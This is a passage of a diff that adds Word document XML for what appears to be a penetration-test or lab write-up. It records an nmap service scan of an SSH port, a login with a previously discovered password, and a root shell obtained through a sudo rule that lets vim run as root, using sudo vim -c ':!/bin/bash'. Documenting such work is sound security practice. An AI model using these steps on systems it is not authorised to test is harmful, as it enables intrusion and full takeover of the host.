+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Discovered additional open port:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>7223 (SSH)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Service version scan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -p 7223 -sV 192.168.5.183</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Service identified:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>OpenSSH 8.2p1 Ubuntu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D26F98F" wp14:editId="1918C1A5">
+            <wp:extent cx="5731510" cy="2820670"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1900935231" name="Picture 40"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1900935231" name="Picture 1900935231"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2820670"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>SSH Access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Connected via SSH:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>ssh shadowops@192.168.5.183 -p 7223</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Used previously discovered password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Successfully logged in as:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>shadowops</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18F12944" wp14:editId="56E13771">
+            <wp:extent cx="5731510" cy="2820670"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="146299145" name="Picture 41"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="146299145" name="Picture 146299145"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2820670"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Privilege Escalation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Checked sudo permissions:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>sudo -l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Output:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>(root) NOPASSWD: /usr/bin/vim</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>This indicates a Sudo Misconfiguration.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082587C5" wp14:editId="19CDB12E">
+            <wp:extent cx="5731510" cy="3187065"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1703272162" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1703272162" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3187065"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Exploiting Vim for Root Access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Executed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo vim -c </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>':!</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>/bin/bash'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>Spawned root shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Verified:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
